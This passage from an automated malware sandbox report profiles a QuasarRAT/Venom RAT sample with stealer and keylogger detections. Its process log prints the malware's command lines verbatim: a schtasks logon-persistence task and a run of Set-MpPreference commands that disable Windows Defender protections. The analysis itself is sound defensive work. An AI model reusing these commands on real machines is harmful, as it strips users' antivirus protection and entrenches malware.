                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Joe Security
                                      • Rule: JoeSecurity_Vermin, Description: Yara detected Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifcats associated with disabling Widnows Defender, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: ditekSHen
                                      • Rule: MALWARE_Win_QuasarRAT, Description: QuasarRAT payload, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: ditekSHen
                                      • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: C:\Users\user\AppData\Roaming\UPX\Client.exe, Author: unknown
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 96%, ReversingLabs
                                      Reputation:low

                                      Target ID:4
                                      Start time:08:26:51
                                      Start date:15/10/2022
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"powershell" Get-MpPreference -verbose
                                      Imagebase:0xe60000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:high

                                      Target ID:5
                                      Start time:08:26:51
                                      Start date:15/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Target ID:6
                                      Start time:08:26:51
                                      Start date:15/10/2022
                                      Path:C:\Users\user\Desktop\JeCXrQSehB.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\JeCXrQSehB.exe
                                      Imagebase:0x410000
                                      File size:547328 bytes
                                      MD5 hash:17E6BFFAFF1EA223913DEB1BC78E74AE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:7
                                      Start time:08:26:57
                                      Start date:15/10/2022
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:"schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\UPX\Client.exe" /rl HIGHEST /f
                                      Imagebase:0xc90000
                                      File size:185856 bytes
                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:8
                                      Start time:08:26:57
                                      Start date:15/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:21
                                      Start time:08:28:21
                                      Start date:15/10/2022
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                      Imagebase:0xe60000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:22
                                      Start time:08:28:21
                                      Start date:15/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:23
                                      Start time:08:28:21
                                      Start date:15/10/2022
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                      Imagebase:0xe60000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:24
                                      Start time:08:28:21
                                      Start date:15/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:25
                                      Start time:08:28:21
                                      Start date:15/10/2022
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                                      Imagebase:0xe60000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:26
                                      Start time:08:28:22
                                      Start date:15/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:27
                                      Start time:08:28:22
                                      Start date:15/10/2022
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                      Imagebase:0xe60000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:28
                                      Start time:08:28:22
                                      Start date:15/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:29
                                      Start time:08:28:22
                                      Start date:15/10/2022
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
                                      Imagebase:0xe60000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:30
                                      Start time:08:28:23
                                      Start date:15/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:31
                                      Start time:08:28:23
                                      Start date:15/10/2022
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                      Imagebase:0xe60000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:32
                                      Start time:08:28:23
                                      Start date:15/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:33
                                      Start time:08:28:23
                                      Start date:15/10/2022
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                      Imagebase:0xe60000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:34
                                      Start time:08:28:23
                                      Start date:15/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:35
                                      Start time:08:28:24
                                      Start date:15/10/2022
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                      Imagebase:0xe60000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:36
                                      Start time:08:28:24
                                      Start date:15/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:37
                                      Start time:08:28:26
                                      Start date:15/10/2022
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                      Imagebase:0xe60000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:38
                                      Start time:08:28:26
                                      Start date:15/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:39
                                      Start time:08:28:26
                                      Start date:15/10/2022
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                      Imagebase:0xe60000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:40
                                      Start time:08:28:27
                                      Start date:15/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:41
                                      Start time:08:28:27
                                      Start date:15/10/2022
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                      Imagebase:0xe60000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:42
                                      Start time:08:28:28
                                      Start date:15/10/2022
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                      Imagebase:0xe60000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:43
                                      Start time:08:28:28
                                      Start date:15/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:44
                                      Start time:08:28:31
                                      Start date:15/10/2022
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                      Imagebase:0xe60000
                                      File size:430592 bytes
                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET

                                      Target ID:45
                                      Start time:08:28:31
                                      Start date:15/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Target ID:46
                                      Start time:08:28:32
                                      Start date:15/10/2022
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6edaf0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:11.7%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:20
                                        Total number of Limit Nodes:1
                                        execution_graph 12547 a6ae90 12548 a6aeae 12547->12548 12551 a692a0 12548->12551 12550 a6aee5 12553 a6c9b0 LoadLibraryA 12551->12553 12554 a6caa9 12553->12554 12527 a60448 12528 a60452 12527->12528 12530 a61db0 12527->12530 12531 a61dd5 12530->12531 12535 a61ea0 12531->12535 12539 a61eb0 12531->12539 12537 a61ed7 12535->12537 12536 a61fb4 12536->12536 12537->12536 12543 a61b2c 12537->12543 12541 a61ed7 12539->12541 12540 a61fb4 12540->12540 12541->12540 12542 a61b2c CreateActCtxA 12541->12542 12542->12540 12544 a62f40 CreateActCtxA 12543->12544 12546 a63003 12544->12546
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.570767939.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a60000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6394266e07cdcd5b680348d355a5e4bc030fdb84c8b41af7c1b6964a2eee945d
                                        • Instruction ID: d59745138c8e360d8158130568a610328687a16a038afa96025bc5b12dd8dcd1
                                        • Opcode Fuzzy Hash: 6394266e07cdcd5b680348d355a5e4bc030fdb84c8b41af7c1b6964a2eee945d
                                        • Instruction Fuzzy Hash: 9FB11870E00219CFDB14CFA9D8957EEBBF2AF88358F148129D819AB794DB749845CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.570767939.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a60000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a619a69b013cb3a3dd977042efea23d38dbecf3fd3ae3dbac7c050a57da91481
                                        • Instruction ID: f175c200e08ba9edad5bd2617f023b8d2b256c2c4d27547f7feee63a82e71a6d
                                        • Opcode Fuzzy Hash: a619a69b013cb3a3dd977042efea23d38dbecf3fd3ae3dbac7c050a57da91481
                                        • Instruction Fuzzy Hash: 11B15C70E002198FDF10CFA9E8917DEBBF2AF88754F148139D819EB698DB749845CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 603 a6c9a7-a6c9a9 604 a6c94f 603->604 605 a6c9ab-a6c9ad 603->605 606 a6c950-a6c991 604->606 605->606 607 a6c9af-a6ca07 605->607 608 a6ca5b-a6caa7 LoadLibraryA 607->608 609 a6ca09-a6ca2e 607->609 616 a6cab0-a6cae1 608->616 617 a6caa9-a6caaf 608->617 609->608 614 a6ca30-a6ca32 609->614 619 a6ca34-a6ca3e 614->619 620 a6ca55-a6ca58 614->620 626 a6cae3-a6cae7 616->626 627 a6caf1 616->627 617->616 622 a6ca42-a6ca51 619->622 623 a6ca40 619->623 620->608 622->622 628 a6ca53 622->628 623->622 626->627 629 a6cae9 626->629 631 a6caf2 627->631 628->620 629->627 631->631
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.570767939.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a60000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: c5d003e49644fa9576ae20d3dfa05819fe7679f9129ab15ad246f0e164da52ce
                                        • Instruction ID: a49d0f598387843f22731c572786552dc3af64415e9804cbf349b5cb12fcde30
                                        • Opcode Fuzzy Hash: c5d003e49644fa9576ae20d3dfa05819fe7679f9129ab15ad246f0e164da52ce
                                        • Instruction Fuzzy Hash: 294146B1E006598FCB10CFA9D885BEEBBB2FB58354F108129D859EB350D7749946CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 632 a62f34-a62f3d 633 a62f72-a63001 CreateActCtxA 632->633 634 a62f3f-a62f6a 632->634 636 a63003-a63009 633->636 637 a6300a-a63064 633->637 634->633 636->637 644 a63066-a63069 637->644 645 a63073-a63077 637->645 644->645 646 a63088 645->646 647 a63079-a63085 645->647 648 a63089 646->648 647->646 648->648
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 00A62FF1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.570767939.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a60000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 277158bcb3a1b9caac10c62259e945e3a2d764be3c9d6502fb67461558080feb
                                        • Instruction ID: 818e71a1fa23f859a6603eafc21490147066b3ad63d9b90db14b7c5dde028e0b
                                        • Opcode Fuzzy Hash: 277158bcb3a1b9caac10c62259e945e3a2d764be3c9d6502fb67461558080feb
                                        • Instruction Fuzzy Hash: 6D41F1B1C04758CFDB24CFA9C884BDEBBB1BF89304F218069D409AB251D775594ACF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 650 a692a0-a6ca07 652 a6ca5b-a6caa7 LoadLibraryA 650->652 653 a6ca09-a6ca2e 650->653 657 a6cab0-a6cae1 652->657 658 a6caa9-a6caaf 652->658 653->652 656 a6ca30-a6ca32 653->656 660 a6ca34-a6ca3e 656->660 661 a6ca55-a6ca58 656->661 666 a6cae3-a6cae7 657->666 667 a6caf1 657->667 658->657 663 a6ca42-a6ca51 660->663 664 a6ca40 660->664 661->652 663->663 668 a6ca53 663->668 664->663 666->667 669 a6cae9 666->669 670 a6caf2 667->670 668->661 669->667 670->670
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.570767939.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a60000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 4c177936e4fb15f4daee1111e6d4248cd03eaac7083a7a5da61c3b08467cf06e
                                        • Instruction ID: 07d52d3fd4f6988a2456da26e99400e852c8d0ed903753168d07e6f42a5ab43f
                                        • Opcode Fuzzy Hash: 4c177936e4fb15f4daee1111e6d4248cd03eaac7083a7a5da61c3b08467cf06e
                                        • Instruction Fuzzy Hash: 8F4135B0D006589FDB10CFE9C8857AEBBF2EB48364F10812AE855EB390D7749845CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 671 a61b2c-a63001 CreateActCtxA 674 a63003-a63009 671->674 675 a6300a-a63064 671->675 674->675 682 a63066-a63069 675->682 683 a63073-a63077 675->683 682->683 684 a63088 683->684 685 a63079-a63085 683->685 686 a63089 684->686 685->684 686->686
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 00A62FF1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.570767939.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a60000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 9e92026fe86dbbecbfbcdfc4d9dce9faf4dd73c3956d1b72c50ddd894985a376
                                        • Instruction ID: 70a1facb8c3ad2f3d651278a67a95cf0885ab6f1949e116967483e58684a6530
                                        • Opcode Fuzzy Hash: 9e92026fe86dbbecbfbcdfc4d9dce9faf4dd73c3956d1b72c50ddd894985a376
                                        • Instruction Fuzzy Hash: 5241E2B1C04758CBDB24CFA9C884BDEBBB5BF89304F218069D509AB251D7756A4ACF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.569713372.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8cd000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b98a245cd9c08632896457a411fff799e425edbe6318e5ddff23401224e7f6d
                                        • Instruction ID: 9fb93ba676800ac1064707108b71ab2df80b31c839c9587b625fb99be095ae2a
                                        • Opcode Fuzzy Hash: 1b98a245cd9c08632896457a411fff799e425edbe6318e5ddff23401224e7f6d
                                        • Instruction Fuzzy Hash: 8821D371508744DFCB15EF18D9C4F26BBB5FB88318F24857DE9098A246C336D816DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.569519720.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8bd000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b70168ca22b6148cb88c03f511f5b96f1bf544afadbd245e7b633a327ceaf3a1
                                        • Instruction ID: a3b7b19cdf97a81264f6250458a2350475ca1902aa6fdd52b2333a6a7d879ad7
                                        • Opcode Fuzzy Hash: b70168ca22b6148cb88c03f511f5b96f1bf544afadbd245e7b633a327ceaf3a1
                                        • Instruction Fuzzy Hash: 1E2148B1508384EFDB05CF00D9C4B66BB61FB88324F24C569E9058B346D336EC16DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.569519720.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8bd000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4880ebc1b66eb7003cfcfe3bbb678a3b355bae360e3dbc3b718242c3efe9dae6
                                        • Instruction ID: 0d30efab8968cf3d74b97c3c5bf9d5638e875cf6ae6bf723940cdcf6c2c39060
                                        • Opcode Fuzzy Hash: 4880ebc1b66eb7003cfcfe3bbb678a3b355bae360e3dbc3b718242c3efe9dae6
                                        • Instruction Fuzzy Hash: A62125B1504344EFDB04DF14D9C0B66BFA5FB98324F24C569E9098B346D33AE846DBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.569713372.00000000008CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008CD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8cd000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b7869358b2da7ddebe1fb75867dc91fec0b9a5aaffeb8da1c929777c2abb7ec
                                        • Instruction ID: 2ce7a72d3abb825e7574254feb1ef4ceae2a2646d03a0c18062a37df98f09e2e
                                        • Opcode Fuzzy Hash: 2b7869358b2da7ddebe1fb75867dc91fec0b9a5aaffeb8da1c929777c2abb7ec
                                        • Instruction Fuzzy Hash: 0B21AF76504280DFCF16DF14D9C4B16BF72FB88314F2886AED9484B616C33AD866CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.569519720.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8bd000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4c6ec07900001600012bfa2eea3f7d10988ed4c4f9b3fcaf888016317e9a1ae
                                        • Instruction ID: 75fec74869e29b26dbae8c2a4dae37863f1af76836dc6a929e47809723d4d0f1
                                        • Opcode Fuzzy Hash: a4c6ec07900001600012bfa2eea3f7d10988ed4c4f9b3fcaf888016317e9a1ae
                                        • Instruction Fuzzy Hash: AA217F76504280DFCB16CF54D9C4B56BF71FB88324F28C6A9DC044B65AD33AE85ACBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.569519720.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8bd000_JeCXrQSehB.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9514fc1bb1cc25f491de601e40aa317d03148fdbbbb3ea0ae0adc63f208d9b49
